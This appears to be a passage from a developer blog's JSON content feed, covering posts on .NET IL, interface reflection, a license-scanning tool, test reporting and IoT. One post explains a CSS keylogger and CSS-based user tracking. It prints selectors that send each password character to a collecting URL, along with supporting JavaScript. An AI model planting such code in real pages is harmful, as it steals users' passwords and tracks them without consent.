Ldarg_1.\nAdding Numbers With ldarg.1 done we now have two values on the stack, the argument to Add is at index 0 and the current value of Count is at index 1. This means we can add those numbers together, which is what the + operator does, resulting in the following IL:\nadd Bet you didn’t pick that’s what the Add OpCode did!\nThis CIL instruction will also put the resulting value onto the stack, so there’s no need to use an ldarg OpCode after it.\nUpdating Our Property It’s time to update the Count property of our object and again we’ll use the Call OpCode to do it:\ncall instance void UserQuery/Counter::set_Count(int32) As we need to pass an argument to set_Count (the auto-generated assignment function) you might wonder how it gets that, well it gets it off the stack. When a function takes arguments it’ll pop off as many as it requires from the stack to execute, so you need to make sure that when you’re pushing data onto the stack it’s pushed on in the right order, otherwise you can end up with type mismatch, or the wrong value being in the wrong argument.\nFinally, Add will exit using the Ret OpCode:\nnop ret I’m not sure why the nop OpCode is included by the compiler, it doesn’t do anything and thus can be omitted.\nConclusion Hopefully you’re still with me and have enjoyed dipping your toe into understanding what an OpCode is in CIL. We’ve broken down the 8 lines of CIL that were generated for this one line of C#:\n1 Count += count; With our method implementation we used the expression body syntax rather than a traditional method signature.\nWhat you may be interested to know is that there is no difference in the IL generated for these two method types, since they are functionally equivalent.\nThe same goes for the use of Count += count vs Count = Count + count, both generate the same CIL as there’s no difference with the addition assignment operator (in our example, there are scenarios when that doesn’t always hold true).\nIt’s important to be able to understand these differences or lack-there-of, so we don’t make arbitrary code style decisions based on preconceived beliefs about how the code is executed.\nWe’ll keep exploring CIL as we go on, so if there’s anything specific you’d like to look into, let me know and we can do some digging!\n", "id": "2019-09-17-what-is-an-opcode" }, { "title": "A Quirk With Implicit vs Explicit Interfaces", "url": "https://www.aaron-powell.com/posts/2019-09-11-a-quirk-with-implicit-vs-explicit-interfaces/", "date": "Wed, 11 Sep 2019 13:08:28 +1000", "tags": [ "dotnet", "csharp", "fsharp", "serverless" ], "description": "Here's something I learnt about interfaces in .NET while exploring IL", "content": "The other day I got to work and the first thing I did was open an IL disassembler and got to town reading the IL of some code I was having a problem with.\nThat’s a pretty normal start to most .NET developers day right? Right…?\nIt all came about as I’m doing some exploration of Durable Entities which is part of the Durable Functions v2 preview that was announced at Build. I was using the new strongly-typed support that appeared in the beta-2 release, and allows you to write entities like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 public interface ICounter { void Add(int count); void Clear(); } [JsonObject(MemberSerialization = MemberSerialization.OptIn)] public class Counter : ICounter { [JsonProperty] public int Count { get; set; } public void Add(int count) => Count += count; public void Clear() => Entity.Current.DestructOnExit(); [FunctionName(nameof(Counter))] public Task Run([EntityTrigger] IDurableEntityContext ctx) => ctx.DispatchAsync<Counter>(); } And then we can invoke it in a strongly-typed manner, rather than using magic strings:\n1 2 // ctx is IDurableEntityContext await ctx.SignalEntityAsync<ICounter>(id, proxy => proxy.Add(1)); This gives some nice type-safety to the way that you work with your entities.\nNaturally though, I wasn’t writing this in C#, I was using F#, which means the code looks more like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 type ICounter = abstract member Add: int -> unit abstract member Clear: unit -> unit [<JsonObject(MemberSerialization = MemberSerialization.OptIn)>] type Counter() = [<JsonProperty>] member val Count = 0 with get, set interface ICounter with member this.Add count = this.Count <- this.Count + count member this.Clear() = this.Count <- 0 [<FunctionName("Counter")>] member __.Run([<EntityTrigger>] ctx : IDurableEntityContext) = ctx.DispatchAsync<Counter>() And the invocation is:\n1 do! ctx.SignalEntityAsync<ICounter>(id, (proxy : ICounter) => proxy.Add(1)) |> Async.AwaitTask But it kept throwing a highly cryptic error within the Durable Functions framework that the call to the method Add failed, but it wouldn’t tell me why. After a bunch of debugging into the source of Durable Functions I found the cause of the failure, the Add method wasn’t being found on the Counter instance. But the C# code worked just fine, so what gives?\nWell it turns out that in F# when you implement an interface it’s implemented explicitly, whereas in C# you can implement an interface implicitly or explicitly.\nInterface Implementations, Implicit vs Explicit Before really understanding the problem we need to understand a bit about how interface implementations work. Let’s do it in C# since it supports both types and we’ll start with an implicit implementation. This is what you’re most likely using when you’re working with interfaces, and it looks like this:\n1 2 3 4 5 6 7 interface IFoo { void Bar(); } class Foo : IFoo { public void Bar() { } } When you do an implicit interface implementation you are adding public non-static methods to the class, and they have to be public non-static (see here). What this means is that the class can be thought of as itself (Foo) or its interface(s) (IFoo) and the members provided by that interface are part of the class, they are implicitly there.\nOk, so what’s an explicit interface implementation look like?\n1 2 3 4 5 6 7 interface IFoo { void Bar(); } class Foo : IFoo { void IFoo.Bar() { } } The difference this time is that in our class we have a non-public Bar function that is prefixed with the interface name (IFoo). Since the member is non-public we have to be explicit that the type is the interface if we want to access the members that are provided by the interface. In the docs there are a few scenarios of why you’d want to use explicit interface implementations over implicit, and it mainly comes down to how to handle multiple interfaces on a single type.\nSince F# only supports explicit interface implementations you only think of types as their interface, which is how I tend to think of types-implementing-interfaces in C# anyway, so what’s the big deal?\nNot All IL is Generated the Same Back to the problem that I’d discovered, it was telling me that the type I was providing, Counter, didn’t have a member Add that could be accessed, and now that we understand how the members of an explicit interface are defined, that actually makes sense, there is no member Add on Counter, its name is actually ICounter.Add, because it’s only part of the interface implementation.\nHere’s the IL generated:\n.method private final hidebysig newslot virtual instance void UserQuery.ICounter.Add ( int32 count ) cil managed { .override method instance void UserQuery/ICounter::Add(int32) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter::set_Count(int32) IL_000e: nop IL_000f: ret } Compare that to the implicit interface implementation:\n.method public final hidebysig newslot virtual instance void Add ( int32 count ) cil managed { .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter2::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter2::set_Count(int32) IL_000e: nop IL_000f: ret } Notice the difference between .method definitions, our explicit is private while implicit is public and the name of the explicit is UserQuery.ICounter.Add (Namespace.InterfaceName.MemberName) compared to Add for implicit.\nWhy Does It Matter? Ok, it’s all very interesting learning about the differences in the IL generated by the compiler, but why is this important to know?\nWell, it turns out that you need to understand this difference if you’re doing Reflection. Let’s say you have a type and you want to get a method of that type by its name. To do that you’d write code like this:\n1 2 3 4 5 6 7 var method = typeof(T).GetMethod( methodName, BindingFlags.IgnoreCase | BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance ); But this will fail if the method name you’re looking for is provided by an explicitly implemented interface!\nTry out this code on try.dot.net:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 using System; using System.Linq; using System.Reflection; public class Program { public static void Main() { Console.WriteLine(string.Join(", ", typeof(FooE).GetMethods(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance).Select(m => m.Name))); Console.WriteLine(string.Join(", ", typeof(FooI).GetMethods(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance).Select(m => m.Name))); } } interface IFoo { void Bar(); } class FooE : IFoo { void IFoo.Bar() => Console.WriteLine("Explicit Bar"); } class FooI : IFoo { public void Bar() => Console.WriteLine("Implicit Bar"); } The output will be:\n1 2 IFoo.Bar, Equals, Finalize, GetHashCode, GetType, MemberwiseClone, ToString Bar, Equals, Finalize, GetHashCode, GetType, MemberwiseClone, ToString Meaning that our call to GetMethod and just providing Bar will return null since this is no method on that type with that name!\nConclusion This was a really fun problem to try and solve, it’s been a long time since I dived deep into .NET internals and it’s quite interesting to learn the difference in the way interface implementations are handled.\nThere’s an open bug on Durable Functions to work out a way to resolve this and it turned out that I caught a few people with this one!\n", "id": "2019-09-11-a-quirk-with-implicit-vs-explicit-interfaces" }, { "title": "A Career in 10 Years", "url": "https://www.aaron-powell.com/posts/2019-09-02-a-career-in-10-years/", "date": "Mon, 02 Sep 2019 09:13:03 +1000", "tags": [ "career" ], "description": "A reflection on my journey over the last 10 years", "content": "Where are you from?\nThis is a pretty common question we ask each other in Australia as most people I know aren’t living in the city they were born in, and it’s a question that I’ve been asked from time to time.\nWhile I live in Sydney most people are surprised to find out that I didn’t grow up in Sydney, but I’m from Melbourne originally. A few days ago I had a memory pop up on Facebook that told me that it was 10 years ago that I left my job in Melbourne and started the journey that would see me where I am today.\nFeeling nostalgic I decided I wanted to share that journey here.\nStarting My Career (aka, Background to the Story) I grew up in Melbourne’s eastern suburbs, went to school and uni out that way and in 2004 graduated with an IT degree from Deakin University. I was a solid-B student, I did well, but never great, and honestly, I was glad when it was done. Being a student isn’t my jam.\nIn 2005 it was time to enter the workforce as an IT professional (I didn’t work IT in uni, I worked fast food!) and my first job was mobile tech support, I’d go out to people’s houses and plug their modems in. Glamorous stuff.\nIn mid-2005 I started interviewing for some software jobs. My first interview I was really excited for, it was as a software tester in gaming! Awesome, who doesn’t want to software test games?! This is where I first learnt what gaming meant as it was a role as a software tester for slot machines. I declined the 2nd interview.\nShortly after I was offered a role at a web development company, it was a graduate role but I didn’t care, I was being paid to write software! This is where I learnt about Content Management Systems (in hindsight I’m surprised I’d never stopped to think about how content on websites was managed…), I got to experience the browser wars, was introduced to Umbraco and learnt all sorts of other technology.\n2009 I had a pretty shitty start to 2009. I’d only just started living out of home for the first time (I was living on my own too) and I separated from my long-term girlfriend so a combination of loneliness and pining saw me pretty down.\nBut the upside to this was that it was the catalyst I needed to start properly getting into Open Source. To fill me, ever-expanding free time, I started contributing to Umbraco and as a result of this, I was invited to Umbraco’s yearly conference, Codegarden. This was the first time I’d ever attended a conference (and I think I’d only once been to a User Group) so the fact that I was invited to travel to Copenhagen was kind of a big deal!\nAs I was preparing to head to Codegarden I made a decision, I would be looking for work. I was pretty unhappy with my life, there was no reconciling the relationship I’d lost (and the friends I’d lost as a result) so I needed a change, and my rationale was that I was starting to get a bit of notice in the Umbraco community and there’d have to be someone looking to hire while I was at the event so why not take an opportunity, even if it meant moving to Europe.\nIt turned out that there was at least 1 person who was hiring there, but the move would be a lot less dramatic. I met Shannon at the retreat prior to Codegarden itself (the retreat is a pre-event where contributors and community influencers join the HQ team to discuss strategy, roadmaps and other stuff) and he was the head of technology at an Umbraco-centric agency based in Sydney and they just so happened to be looking for a Senior Developer. Well, when we got back from Denmark I chatted with them a bit more, I put forth what I was looking for, they agreed and at the start of August, I told my parents I was going to move to Sydney and I resigned from my job.\nStarting a New Life in Sydney To a certain degree, the move to Sydney was not being done for the right reasons, I was ultimately trying to escape my past by running away. Totally healthy! But at the time I thought it was the right thing to do.\nWhen I moved to Sydney I didn’t know anyone. I didn’t attend User Groups or conference then so I just went to work and then went home and coded (or watched TV). Not an overly glamorous life and what’s more was it started feeding into the self-doubt that I had about moving to begin with.\nBy the end of 2009, I was pretty miserable, I hadn’t met any new people (other than those I worked with) which was probably not helped by the fact that I wasn’t really trying to meet people.\nI was left with two options, pack it in and move back to Melbourne or make an effort to actually try and meet some people. Given I’d tried nothing and was reaping the benefits of that it was time to try something.\nIn 2009 Twitter was starting to take off in the tech community and this was where I started. While I might not have “got” it (and maybe still don’t) it was a useful tool to start finding out about people in tech that were in Sydney without actually going out!\nThe next step was starting to attend User Groups and I started attending ones that the people I was “meeting” on Twitter were also attending. This helped make it feel a whole lot less daunting; I was no longer going somewhere where I didn’t know anyone, I was going somewhere that I hadn’t met anyone, which was an important difference. Since I “knew” some people in attendance from Twitter it was a lot easier to strike up a conversation, we’d just carry on from something we were chatting about online.\n2019 10 years and 3 employers later and I’m still in Sydney.\nWhen I look back at where I was in 2019 it does feel surreal. I very nearly called off the experiment of moving interstate but now when I look at it I can’t imagine what my life would’ve been like if I had.\nIt took me a while to get over the self-doubt that I had but something that I think everyone can relate to, everyone’s had points in their life where they wonder if they’ve made the right call.\nI might not have moved to Sydney for the right reasons but there are plenty more wrong reasons that I could’ve stayed in Melbourne.\nAnd if it’d not been for that I wouldn’t have had the opportunities to grow into a leadership role, try my hand at sales or join Microsoft.\nIn the end, you’ll never know what you’re capable of if you never give it a try. So what are you waiting for?\n", "id": "2019-09-02-a-career-in-10-years" }, { "title": "More License Discovery With dotnet-delice", "url": "https://www.aaron-powell.com/posts/2019-08-30-more-license-discovery-with-dotnet-delice/", "date": "Fri, 30 Aug 2019 10:16:20 +1000", "tags": [ "dotnet", "fsharp" ], "description": "A new release of dotnet-delice with even more license discovery support", "content": "In my last post I introduced you to a tool for looking up licenses of .NET projects called delice.\nThis week I released the first update, version 1.1.0, that brings a big improvement to the license detection for the legacy licensing format of many NuGet packages.\nDetermine Licenses via the GitHub API By-and-large the dependencies we rely on are the output of an OSS project and that project is more often than not hosted on GitHub. Because of this we can use the GitHub License API to try and get the license information of a project, which delice now supports:\n$> dotnet delice --check-github ~/my-project The way this works is that when delice finds a project using the legacy licenseUrl nuspec property and that license isn’t a hard-coded one in the cache, it’ll look at the URL and determine if it’s a URL to a license on GitHub.\nTake the license for the package Microsoft.AspNetCore, which gives a url of https://raw.githubusercontent.com/aspnet/AspNetCore/2.0.0/LICENSE.txt. From here, delice will get the repository owner (aspnet) and the repository name (AspNetCore) to then call the GitHub API and get back the license information, which will tell me that the license is Apache-2.0. delice will then cache that internally for the run so if the URL is used across a number of packages, or that package is referenced in a number of projects in the solution, it’ll only hit the API once.\nThe code to do this can be found here.\nIt’s worth noting that there is a known limitation of the API check, it’ll always check the license against master, not any other branch or tag. This is a design choice, so while it does mean you may get a different license if a project was re-licensed across versions, I expect the likelihood of that to be low, relative to the effort required to support it. After all, this is meant to be a workaround for packages that haven’t been updated to use the new nuspec format, not a proper solution.\nAvoiding Rate Limiting By default the API call is done anonymously and that means you have a limit of 50 calls per hour to the GitHub API, something that could be blown out in a single run if you have a lot of legacy-style NuGet packages. It’s better to provide a GitHub Personal Access Token to the call like so:\n$> token=abc123... $> dotnet delice --check-github --github-token $token ~/my-project When you provide a token the rate limit is increased to 5000 calls per hour, which should work for most scenarios. If you are hitting rate-limit issues I’d like to know so we can work out even smarter solutions (I have ideas but I only want to invest in the effort if it’s actually needed!).\nComparing with Common Templates Relying on the GitHub API isn’t foolproof, not all licenses are detected by GitHub and not all projects are hosted on GitHub. Also, if you embed the license file in the NuGet package, rather than just provide an SPDX identifier, it’s still not possible to know what the license is.\nTo address this I’ve borrowed from the approach that GitHub uses for license detection and implemented some complex maths in the form of Sørensen–Dice coefficient to compare a license against a known template:\n$> dotnet delice --check-license-content ~/my-project When you provide this flag delice will download the file contents from the URL and compare it to some templates stored within itself. If any are a close enough match (the threshold is 90%) delice will assume that that is the license of the project.\nThe code to do this can be found here, including the implementation of the Dice coefficient (which I found online 😝).\nPresently I only have MIT and Apache-2.0 as templates to compare as they seemed to be the most common ones I’ve come across when doing my research, but if there are others let me know or send me a PR.\nShowing License Conformance When trying to be aligned with Tiereny’s delice I needed to add one missing piece, showing the license conformance to the SPDX list. I’ve added this to the 1.1.0 release of delice and now you can see which of your projects are licensed using OSI or FSF approved licenses, and whether any licenses are using a deprecated license format:\nProject dotnet-delice License Expression: MIT ├── There are 10 occurances of MIT ├─┬ Conformance: │ ├── Is OSI Approved: true │ ├── Is FSF Free/Libre: true │ └── Included deprecated IDs: false └─┬ Packages: ├── FSharp.Core ├── Microsoft.NETCore.App ├── Microsoft.NETCore.DotNetAppHost ├── Microsoft.NETCore.DotNetHostPolicy ├── Microsoft.NETCore.DotNetHostResolver ├── Microsoft.NETCore.Platforms ├── Microsoft.NETCore.Targets ├── NETStandard.Library ├── Newtonsoft.Json └── System.ComponentModel.Annotations This will help you ensure that you understand more about the licenses in use with a quick scan, without having to know the details of each license type.\nExtracting Out the Core Another change I introduced in the 1.1.0 release was to extract the core of delice out into a separate NuGet package, DotNetDelice.Licensing. While you don’t need this package when you install the CLI tool (tools are self-contained) it’s available if you want to integrate it into any other tool or system you’re building.\nBe aware though that I’ve written this in F# and it’s using F# styling and types, so expect to deal with them.\nConclusion That’s a lap around what’s new in release 1.1.0 so be sure to check it out as it’ll, hopefully, give you more coverage of what licenses you have in your projects.\nIf you’re using it I’d love to know what you think of these updates and what other features you’d like to see from delice going forward.\n", "id": "2019-08-30-more-license-discovery-with-dotnet-delice" }, { "title": "What Licenses Are in Use?", "url": "https://www.aaron-powell.com/posts/2019-08-20-what-licenses-are-in-use/", "date": "Tue, 20 Aug 2019 08:57:59 +1000", "tags": [ "dotnet", "fsharp" ], "description": "Ever wondered what licenses are in use of your project? Here's a tool to help you out", "content": "Have you ever wondered what licenses the dependencies of your .NET project are? In the ever-expanding world of open source software usage ensuring that your being compliant with the licenses of your dependencies is becoming harder. Do you have copyleft dependencies? Are you abiding by their licensing terms? Maybe there’s some legally grey licenses like WTFPL that you need to watch out for.\nThis can become even trickier when you look into transient dependencies. You know what dependencies you directly consume, but what about the ones that you indirectly consume as they are a dependency of a dependency?\nEnter dotnet-delice TL;DR: I created a dotnet global tool called dotnet-delice to help you with this.\ndotnet-delice, or delice for short, is a tool that will look at the dependencies you have in your project and attempt to determine what license they use and display the results for you. This is a port of the Node.js utility delice, created by Tierney Cyren.\nYou can install it from NuGet:\n1 > dotnet tool install --global dotnet-delice --version 1.0.0 And then run it by pointing to a folder, a solution file or a csproj/fsproj file:\n1 > dotnet delice ~/github/DotNetDelice/DotNetDelice.sln Here’s a snapshot of the output it will generate:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Project dotnet-delice License Expression: MIT ├── There are 10 occurances of MIT └─┬ Packages: ├── FSharp.Core ├── Microsoft.NETCore.App ├── Microsoft.NETCore.DotNetAppHost ├── Microsoft.NETCore.DotNetHostPolicy ├── Microsoft.NETCore.DotNetHostResolver ├── Microsoft.NETCore.Platforms ├── Microsoft.NETCore.Targets ├── NETStandard.Library ├── Newtonsoft.Json └── System.ComponentModel.Annotations delice will scan the dependency graph of the project and output the license information in a human-readable format (above) or generate JSON (to stdout or a file). The JSON could be used in a build pipeline to fail a build if there are unexpected licenses detected.\nYou’ll find the source code on GitHub if you want to have a dig around in it yourself.\nA Note on Package Licenses While I was doing my research into how this works I came across this NuGet issue. This issue raised a concern about the license information in the nuspec file being just the licenseUrl. Since the license is external to the package the URL could conceivably change without changing the package, thus changing the license you agreed to originally without your knowledge.\nThis resulted in the deprecation of licenseUrl in favour of a license property. Now the solution is to store the license expression (ideally in spdx format) or embed the license file within the package. Here is how it’s set in my project.\nBy taking this approach the license is now tied to the release of the package and thus you’re unlikely to have it changed without you knowing, since a change requires an updated package.\nAs this is quite a large change to the NuGet ecosystem many packages are still using the legacy licensing format. This makes it a little more challenging for delice to work out what license a package uses. Currently, the tool has a “cache” of known license URLs and which license it maps to (and the packages that use it), but when a license is found that isn’t known it’ll be marked as “Unable to determine” and show the URL in the output. Feel free to submit a PR to add the URL to the cache!\nHopefully, the increased visibility will help encourage package authors to update their license information or encourage people to submit PR’s to update.\nConclusion delice aims to empower you with information so that you understand what’s in use by your projects and make the appropriate decisions about the dependencies you use.\nThere’s a bit of a roadmap on the projects GitHub repo but I’d like to hear what you would want from this tool.\n", "id": "2019-08-20-what-licenses-are-in-use" }, { "title": "CSS Can Do This... And It's Terrifying!", "url": "https://www.aaron-powell.com/posts/2019-08-14-css-can-do-this-and-its-terrifying/", "date": "Wed, 14 Aug 2019 11:33:46 +1000", "tags": [ "css" ], "description": "A look at how you can abuse CSS for evil(?)", "content": "Time for #DevDiscuss!\nTonight's topic: CSS can do that?\nLet's start with some questions:\n- What is a CSS feature not everybody knows about?\n- What has changed about CSS capabilities in the past few years?\n- How do you approach browser support issues and fallbacks? pic.twitter.com/eg9THMsVnT\n— DEV Community (@ThePracticalDev) August 14, 2019 Inspired by today’s #DevDiscuss I commented with my favourite misdeeds in CSS.\nDid you know you can do user tracking of clicks/mouse movements/etc. only with CSS?\nHow about creating a keylogger?\nYep, all that's possible with CSS #DevDiscuss https://t.co/vIzJdSHNp7\n— Aaron Powell (@slace) August 14, 2019 So let’s have a look at how they work.\nCSS Keylogger This has been around for a while now that you can use CSS to create a keylogger, but as is rightly pointed out in this post it’s not “really” just CSS, it does rely on some JavaScript. So let’s dissect how it works.\nWe have our selector like so:\n1 2 3 input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Assume it’s repeated for every character you want to log.\nThe important part of the selector is the substring match on value, this part: [value$="a"]. This is an attribute selector, specifically a substring selector that was added as part of CSS 3 and what it’s doing is saying is that it’ll match when the value attribute of the DOM element ends with a (you can use ^ for begins with if you wanted).\nSo we’re matching when the value attribute contains that but if you were to look into the DOM of a form on a page you’ll notice something, the value attribute isn’t set. Here, take a look at this:\nIf you open up the dev tools in your browser you’ll notice that when you type in the input the attribute doesn’t change, it’s always set to Test here. But if you were to use JavaScript to inspect the value, document.getElementById('demo-01').value it’ll have what you entered. This is because the attribute represents the default value of the <input>, not the current value, that’s something that might get computed, depending on the type of input you have.\nWhat does it mean for us creating a keylogger in CSS? Well, the simple fact is that you can’t create one purely with CSS but you can create one with CSS and a bit of JavaScript because we’re going to need to update the value attribute along the way.\nThis is quite easy to do, you just need some JavaScript like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 let inputs = document.getElementsByTagName("input"); for (let i = 0; i < inputs.length; i++) { let input = inputs[i]; input.addEventListener("keypress", e => { e.preventDefault(); let char = String.fromCharCode(e.keyCode); let newValue = input.value + char; input.setAttribute("value", newValue); input.setSelectionRange(newValue.length, newValue.length); }); } What this does is it “pretends” that you’re doing your keypress appropriately by catching it early and then pushing the character you intended to enter onto the value attribute, making it look like you were typing normally. We then use the setSelectionRange method on the input to position the caret to the end of the input so you are none the wiser. A demo can be found here of this in action.\nBut if you’re able to run JavaScript to bypass how the DOM works, why bother with CSS anyway? The problem isn’t so much the code you write but more the code you might leverage, in particular, UI frameworks.\nFor example, React synchronises the value attribute with state if you’re using a controlled form, which is something that this issue tracks. So if you’re on a website that is using React then that website is vulnerable to this kind of an attack, whether it’s through an extension in your browser or some dodgy ad running on the site.\nYes, you require JavaScript to properly implement a “CSS keylogger”, but that doesn’t mean that you have to write the JavaScript.\nI just want to quickly touch on some points the author makes in this post. They state that it’s not really a big deal because the background-image is only done for the first match so repeated characters won’t pick up (e.g. a password of password will miss a s), and that is true (the value didn’t change the last character at pass so the selector wasn’t triggered) but the data capture will include timestamps and if you take a level of variance between the timestamp of events you can extrapolate your own gaps (if it took 0.1ms between captures and then there was an 0.5, maybe some characters were duplicated). The same goes for the observation that the order-of-receive isn’t guaranteed. That’s true, the server may receive them out of order, but when you have all (or 90+%) characters of a password the ability to brute force goes down drastically.\nUser Tracking with CSS This is not quite as scary as a keylogger but it does borrow the same underlying principle as the keylogger.\nFor this we’re going to exploit CSS Pseudo-Classes, which allow us to hook into a number of events of DOM elements.\nHover over me\nClick me Here’s the CSS that I applied to those elements:\n1 2 3 4 5 6 7 8 9 10 11 #demo-02 p:hover { background-color: #f0a; } #demo-02 input:focus { background-color: #bada55; } #demo-02 button:active { color: #ff0000; } I’m just using pseudo-classes like :hover, :focus and :active to know when you’ve done something and then change some colours, but again I could be setting the background-image to a tracking URL.\nHow could this be made useful? Well, think of it like implementing Google Analytics, you could do something like attach a :hover state to the body element so you know when the page is appearing for the user and then more hover states on all the child elements; as the user moves around the page you’re capturing the rough position of their cursor and knowing what they are spending their time on. If there’s a form you can work out how long they spent on each field, how they navigate forwards and backwards through a multi-step form, or if they change answers on radio buttons/checkboxes.\nLike the keylogger it isn’t as straight forward as it might seem, you would have to have a decent idea of the structure of the DOM to be able to create a really fine-grade tracker (or use JavaScript), but if you’re using it for your own analytics it’s very achievable.\nCSS is Turing Complete Ok, CSS + HTML if you want to be pedantic but it’s true, it is possible to implement Rule 110 with just CSS and HTML:\nCredit to eliheeli on GitHub for the working example of it.\nThis works by abusing Pesudo-classes like our tracker and combining those with the Adjacent sibling combinator. The adjacent sibing combinator, or + for short, works like this:\nI'm a paragraph.\nI'm an adjacent paragraph\n1 2 3 4 5 6 7 8 #demo-03 p { color: #00bb00; } #demo-03 p + p { font-family: "Comic Sans MS", sans serif; font-style: italic; } Here we’re applying a rule to all p elements, but then we’re using the adjacent sibling selector to apply a rule to the 2nd p only (in this case, turning on a different font family and style). By applying conditions on the first half of the selector, such as a pesudo-class, the cascade of the rules can be greatly limited.\nEmoji Class Names Who doesn’t love themselves a liberal usage of Emoji’s throughout their work? Well did you know that you can use Emoji as the class names in CSS? According to the spec they are technically valid, meaning you can do this:\nHello!\n1 2 3 4 5 6 7 #demo-04 .🤣 { font-family: "Comic Sans MS"; text-decoration: #f0a underline overline wavy; text-shadow: 2px 2px #bada55; transform: rotate(45deg); display: inline-block; } In reality you probably shouldn’t do this, but hey, you could shave a few bytes over the wire for the sake of a few users not being able to access your site (or dev on your codebase)!\nConclusion What started from a throw-away tweet became the catalyst for writing a post I’ve been meaning to do for a few years now! 🤣\nI hope you’ve enjoyed a look at a few things you can do with CSS, but maybe shouldn’t.\nWhat are your favourite ways to exploit CSS?\n", "id": "2019-08-14-css-can-do-this-and-its-terrifying" }, { "title": "Showing VS Code Extension Test Outputs in Azure Pipelines", "url": "https://www.aaron-powell.com/posts/2019-08-08-showing-vscode-extension-test-outputs-in-azure-pipelines/", "date": "Thu, 08 Aug 2019 10:26:12 +1000", "tags": [ "vscode", "testing", "azure-devops" ], "description": "A guide on how to display test outputs from VS Code Extension tests in Azure Pipelines", "content": "I’ve been working on my VS Code Profile Switching Extension and one thing that I wanted to ensure I was doing in it was writing tests. There’s a good guide on writing tests from the VS Code team which I recommend you read if you’re an extension author.\nIn this post, I want to look at how we can combine the output of our test runs in a Continuous Integration pipeline, for which I’ll be using Azure Pipelines (which is free for open source projects!).\nGenerating Test Output for Azure Pipelines Azure Pipelines supports a number of different test result formats in the Publish Test Results task that we’ll need to use and one of those is Xunit which Mocha supports out of the box.\nGreat, we can set the reporter to xunit by updating the test runner script:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import * as path from "path"; import * as Mocha from "mocha"; import * as glob from "glob"; export function run(): Promise<void> { // Create the mocha test const mocha = new Mocha({ ui: "tdd", reporter: "xunit" //change the reporter to xunit }); mocha.useColors(true); const testsRoot = path.resolve(__dirname, ".."); return new Promise((c, e) => { glob("**/**.test.js", { cwd: testsRoot }, (err, files) => { if (err) { return e(err); } // Add files to the test suite files.forEach(f => mocha.addFile(path.resolve(testsRoot, f))); try { // Run the mocha test mocha.run(failures => { if (failures > 0) { e(new Error(`${failures} tests failed.`)); } else { c(); } }); } catch (err) { e(err); } }); }); } And this works nicely… except the xunit output is an XML file which, might be readable by a computer but it’s not ideal for local testing, I’d much prefer to use Spec (or Nyan!), but Mocha only supports a single reporter as the output.\nUsing Multiple Reports Thankfully, someone in the community has created a reporter for Mocha which is a pass-through that allows you to output to multiple reporters!\nStart by installing mocha-multi-reporters:\n1 npm install --save-dev mocha-multi-reporters Now we can change the way we configure Mocha to use as many output reporters as we want:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import * as path from "path"; import * as Mocha from "mocha"; import * as glob from "glob"; import { createReport } from "../coverage"; export function run(): Promise<void> { const mocha = new Mocha({ ui: "tdd", timeout: 7500, reporter: "mocha-multi-reporters", reporterOptions: { reporterEnabled: "spec, xunit", xunitReporterOptions: { output: path.join(__dirname, "..", "..", "test-results.xml") } } }); mocha.useColors(true); // snip } Once combined with the Azure Pipeline task for publishing test results we’ll now see the output in Azure Pipelines!\nYou can check out my extensions Azure Pipelines.\n", "id": "2019-08-08-showing-vscode-extension-test-outputs-in-azure-pipelines" }, { "title": "Home Grown IoT - What's Next?", "url": "https://www.aaron-powell.com/posts/2019-08-02-home-grown-iot-whats-next/", "date": "Fri, 02 Aug 2019 09:22:44 +0800", "tags": [ "iot" ], "description": "What's next with my IoT project?", "content": "Over the last 8 posts I’ve looked at IoT solution design through local development and DevOps.\nAnd with that, we’re coming to the end of what I’ve built so far for my project and now it’s time to start thinking about what I could do next with it.\nVisualisation and Reporting This is the first thing that I want to target going forward with the project, some way to visualise the power generation. Right now, I’m just dumping the data into an Azure Table (see the post on Data Design) but not doing anything with it.\nWhen it comes to the visualisation platform there’s the question between build vs buy. I could create a series of charts and reports using SVG’s + React but then I’ll find myself in a situation where I’m going to be constantly tweaking the codebase or fixing bugs when the charts aren’t quite right.\nInstead, I’m going to invest in PowerBI which is part of the Microsoft platform and a really simple tool for creating reports from data sources.\nData Cleanup I have started playing with some reports in PowerBI and what it’s lead me to realise is that I’m likely going to have to do some cleanup to the data to make it simpler to report on. Right now, I’m getting data every 20 seconds from the inverter so for a day I have a lot of data samples. The problem is that this data is so fine grade that it becomes difficult to have clean and consistent views across it.\nInstead, it would be better to do a wider time slice that normalises the data, maybe aggregate it up into 10-minute chunks and take the mode of that time slice. This helps remove any noise from the data and produce a smoother view-over-time.\nI’m yet to work out what’ll be the best way to produce this normalisation of the data, but I’ll be sure to blog it once it’s done!\nIntegrating Other Data Sources Once you start producing a data set from a system you’re monitoring it’s worthwhile starting to think about other data sets that may provide greater context into the data that you’ve captured.\nIn my scenario of a monitoring solar energy generation, there’s one really useful piece of context that I could capture, the weather!\nBy tapping into a weather feed and storing that alongside the readings from the inverter I would be able to do correlative data analysis and answer questions like when the weather is sunny and it’s midday I generate X kw/hr.\nThis can then lead to being able to do anomily detection in my power generation. If I know what the weather is like I can predict the power generation, and if it doesn’t match the expected ranges that could indicate an issue with my panels (they need cleaning, they have sustained damage, etc.).\nAnd this is what is commonly referred to as Predictive Maintenance through IoT. On Microsoft Docs there is a walkthrough on how to create this yourself which I plan on looking into myself once I get to this phase of my project.\nConnected House What’s the end goal? A fully connected house!\nIf I’m able to predict the power generation then I could start optimising the utilisation of the appliances in our house. Are we generating at peak capacity? Time to run the washing machine and 